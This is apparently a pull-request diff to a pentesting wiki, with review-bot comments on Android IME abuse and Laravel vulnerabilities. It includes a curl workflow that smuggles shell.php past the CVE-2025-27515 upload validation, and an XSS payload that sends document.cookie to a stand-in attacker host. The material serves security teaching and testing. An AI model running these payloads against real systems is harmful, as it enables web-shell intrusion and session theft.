1 change: 1 addition & 0 deletions src/SUMMARY.md
@@ -375,6 +375,7 @@
- [Objection Tutorial](mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md)
- [Google CTF 2018 - Shall We Play a Game?](mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md)
- [In Memory Jni Shellcode Execution](mobile-pentesting/android-app-pentesting/in-memory-jni-shellcode-execution.md)
- [Inputmethodservice Ime Abuse](mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md)
- [Insecure In App Update Rce](mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md)
- [Install Burp Certificate](mobile-pentesting/android-app-pentesting/install-burp-certificate.md)
- [Intent Injection](mobile-pentesting/android-app-pentesting/intent-injection.md)
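Review bot: the new SUMMARY entry sorts correctly between `In Memory Jni Shellcode Execution` and `Insecure In App Update Rce`, but the title `Inputmethodservice Ime Abuse` looks auto-generated from the filename; `InputMethodService IME Abuse` (the Android class name plus the acronym) would read better and match how the page itself refers to IMEs.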
@@ -81,3 +81,4 @@ adb shell ime help
- **User/MDM**: allowlist trusted keyboards; block unknown IMEs in managed profiles/devices.
- **App-side (high risk apps)**: prefer phishing-resistant auth (passkeys/biometrics) and avoid relying on β€œsecret text entry” as a security boundary (a malicious IME sits below the app UI).

{{#include ../../banners/hacktricks-training.md}}
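Review bot: the opening quote in `β€œsecret text entry”` on the App-side bullet is mojibake (the UTF-8 bytes of U+201C displayed as Latin-1), so the rendered page prints garbage there; replace it with plain ASCII quotes. The User/MDM bullet could also name the concrete control behind "allowlist trusted keyboards": on managed devices `DevicePolicyManager.setPermittedInputMethods()` restricts which IME packages users may enable, which gives admins something actionable rather than a goal.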
55 changes: 55 additions & 0 deletions src/network-services-pentesting/pentesting-web/laravel.md
@@ -134,6 +134,33 @@ email=a@b.c&password=whatever&remember=0xdf

---

## CVE-2025-27515 – Wildcard file validation bypass (`files.*`)

Laravel 10.0–10.48.28, 11.0.0–11.44.0 and 12.0.0–12.1.0 let crafted multipart requests completely skip any rule attached to `files.*` / `images.*`. The parser that expands wildcard keys could be confused with attacker-controlled placeholders (for example, pre-populating `__asterisk__` segments), so the framework would hydrate `UploadedFile` objects without ever running `image`, `mimes`, `dimensions`, `max`, etc. Once a malicious blob lands in `Storage::putFile*` you can pivot to any of the file-upload primitives already listed in HackTricks (web shells, log poisoning, signed job deserialization, …).

### Hunting for the pattern

* Static: `rg -n "files\\.\*" -g"*.php" app/` or inspect `FormRequest` classes for `rules()` returning arrays that contain `files.*`.
* Dynamic: hook `Illuminate\Validation\Validator::validate()` via Xdebug or Laravel Telescope in pre-production to log every request that hits the vulnerable rule.
* Middleware/route review: endpoints bundling multiple files (avatar importers, document portals, drag-n-drop components) tend to trust `files.*`.

### Practical exploitation workflow

1. Capture a legitimate upload and replay it in Burp Repeater.
2. Duplicate the same part but alter the field name so it already includes placeholder tokens (e.g., `files[0][__asterisk__payload]`) or nest another array (`files[0][alt][0]`). On vulnerable builds, that second part never gets validated but still becomes an `UploadedFile` entry.
3. Point the forged file to a PHP payload (`shell.php`, `.phar`, polyglot) and force the application to store it in a web-accessible disk (commonly `public/` once `php artisan storage:link` is enabled).

```bash
curl -sk https://target/upload \
-F 'files[0]=@ok.png;type=image/png' \
-F 'files[0][__asterisk__payload]=@shell.php;type=text/plain' \
-F 'description=lorem'
```

Keep fuzzing key names (`files.__dot__0`, `files[0][0]`, `files[0][uuid]` …) until you find one that bypasses the validator but still gets written to disk; patched versions reject these crafted attribute names immediately.

---

## Laravel Tricks

### Debugging mode
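Review bot: the CVE-2025-27515 section lists affected ranges but never names the patched releases; add the fixed versions from the linked advisory (GHSA-78fx-h6xr-vch4) next to the version list instead of leaving readers to infer them from the upper bounds. The static check under "Hunting for the pattern" only greps for the attribute name `files\.\*`, while the paragraph above says `images.*` is equally affected, i.e. any wildcard key carrying a file rule; search for the rule side instead (wildcard keys whose rule string contains `image`, `mimes`, `mimetypes` or `file`) so other attribute names are not missed. The section also lacks the remediation bullets the IME page in this same PR has: upgrade, and as defence in depth validate uploads again at the storage layer (extension allowlist, image re-encoding, storage outside the web root) so a validator bypass alone does not become code execution.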
@@ -145,6 +172,27 @@ For example `http://127.0.0.1:8000/profiles`:

This is usually needed for exploiting other Laravel RCE CVEs.

#### CVE-2024-13918 / CVE-2024-13919 – reflected XSS in Whoops debug pages

* Affected: Laravel 11.9.0–11.35.1 with `APP_DEBUG=true` (either globally or forced via misconfigured env overrides like CVE-2024-52301).
* Primitive: every uncaught exception rendered by Whoops echoes parts of the request/route **without HTML encoding**, so injecting `<img src>` / `<script>` in a route or request parameter yields stored-on-response XSS before authentication.
* Impact: steal `XSRF-TOKEN`, leak stack traces with secrets, open a browser-based pivot to hit `_ignition/execute-solution` in victim sessions, or chain with passwordless dashboards that rely on cookies.

Minimal PoC:

```php
// blade/web.php (attacker-controlled param reflected)
Route::get('/boom/{id}', function ($id) {
abort(500);
});
```

```bash
curl -sk "https://target/boom/%3Cscript%3Efetch('//attacker/x?c='+document.cookie)%3C/script%3E"
```

Even if debug mode is normally off, forcing an error via background jobs or queue workers and probing the `_ignition/health-check` endpoint often reveals staging hosts that still expose this chain.

### Fingerprinting & exposed dev endpoints

Quick checks to identify a Laravel stack and dangerous dev tooling exposed in production:
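Review bot: the PoC comment `// blade/web.php` points at a path that does not exist in a Laravel project; route definitions live in `routes/web.php`, so fix the comment or readers will look in the Blade views directory. The heading names both CVE-2024-13918 and CVE-2024-13919, but the bullets and the reference added later in this PR cover only 13919 and never say what distinguishes the two; add one line per CVE or drop 13918 from the heading. "stored-on-response XSS" in the Primitive bullet contradicts the heading's "reflected XSS"; pick one term. Finally, state the defensive side the bullets only imply: `APP_DEBUG=false` in production and upgrading past the affected 11.35.1 range, which removes the Whoops rendering the whole chain depends on.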
@@ -172,6 +220,9 @@ Using the secret APP_KEY of Laravel you can decrypt and re-encrypt cookies:

### Decrypt Cookie

<details>
<summary>Decrypt/encrypt cookies helper (Python)</summary>

```python
import os
import json
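Review bot: the `<details>` element opened here is closed only in the next hunk, so verify the rendered output: mdBook passes raw HTML through, and the fenced block inside it is parsed as markdown only because a blank line follows `</summary>`, which this hunk does include. Collapsing the helper also hides it from readers skimming the page; a one-line description outside the block of what `decrypt`/`encrypt` do, and that they need the leaked `APP_KEY` mentioned in the sentence above, would keep the section usable when collapsed.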
@@ -231,6 +282,8 @@ decrypt('eyJpdiI6ImJ3TzlNRjV6bXFyVjJTdWZhK3JRZ1E9PSIsInZhbHVlIjoiQ3kxVDIwWkRFOE1
encrypt(b'{"data":"a:6:{s:6:\"_token\";s:40:\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2SwepVOiUw\";s:8:\"username\";s:8:\"guest60e\";s:5:\"order\";s:8:\"lolololo\";s:9:\"direction\";s:4:\"desc\";s:6:\"_flash\";a:2:{s:3:\"old\";a:0:{}s:3:\"new\";a:0:{}}s:9:\"_previous\";a:1:{s:3:\"url\";s:38:\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\";}}","expires":1605141157}')
```

</details>

### Laravel Deserialization RCE

Vulnerable versions: 5.5.40 and 5.6.x through 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))
@@ -255,6 +308,8 @@ Another deserialization: [https://github.com/ambionics/laravel-exploits](https:/
* [CVE-2024-52301 advisory – Laravel argv env detection](https://github.com/advisories/GHSA-gv7v-rgg6-548h)
* [CVE-2024-52301 PoC – register_argc_argv HTTP argv β†’ --env override](https://github.com/Nyamort/CVE-2024-52301)
* [0xdf – HTB Environment (CVE‑2024‑52301 env override β†’ auth bypass)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
* [GHSA-78fx-h6xr-vch4 – Laravel wildcard file validation bypass (CVE-2025-27515)](https://github.com/laravel/framework/security/advisories/GHSA-78fx-h6xr-vch4)
* [SBA Research – CVE-2024-13919 reflected XSS in debug-mode error page](http://www.openwall.com/lists/oss-security/2025/03/10/4)


{{#include ../../banners/hacktricks-training.md}}
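Review bot: the new SBA Research entry links the oss-security mailing-list post over plain `http://`; use `https://www.openwall.com/...`, and since the entry is credited to SBA Research either link SBA's own advisory or retitle it as the oss-security post. No reference is added for CVE-2024-13918 although the new Whoops section heading names it alongside 13919. The pre-existing line above the additions also shows a mojibake arrow (`β†’`) where `→` was intended; worth fixing in the same touch since the list is being edited here.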